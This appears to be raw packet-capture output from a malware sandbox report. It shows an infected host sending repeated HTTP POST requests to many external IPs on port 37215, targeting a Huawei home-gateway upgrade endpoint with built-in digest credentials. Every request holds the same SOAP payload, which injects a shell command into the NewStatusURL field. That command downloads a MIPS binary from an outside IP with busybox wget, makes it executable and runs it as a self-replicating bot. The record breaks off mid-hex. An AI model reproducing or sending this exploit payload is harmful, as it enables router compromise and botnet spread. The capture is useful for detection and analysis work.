                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1408192.168.2.133338241.24.234.16337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.560853958 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1409192.168.2.1333534157.19.190.11137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.560873032 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1410192.168.2.1359400157.179.205.20637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.560895920 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1411192.168.2.134012841.118.205.7537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.560913086 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1412192.168.2.136089040.131.129.20837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.560936928 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1413192.168.2.1348804197.23.44.8437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.560952902 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1414192.168.2.1356052157.54.126.2737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.560971975 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1415192.168.2.133868041.23.87.2137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.560991049 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1416192.168.2.135536641.68.209.23537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.560998917 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1417192.168.2.1345454197.130.245.12837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.561014891 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 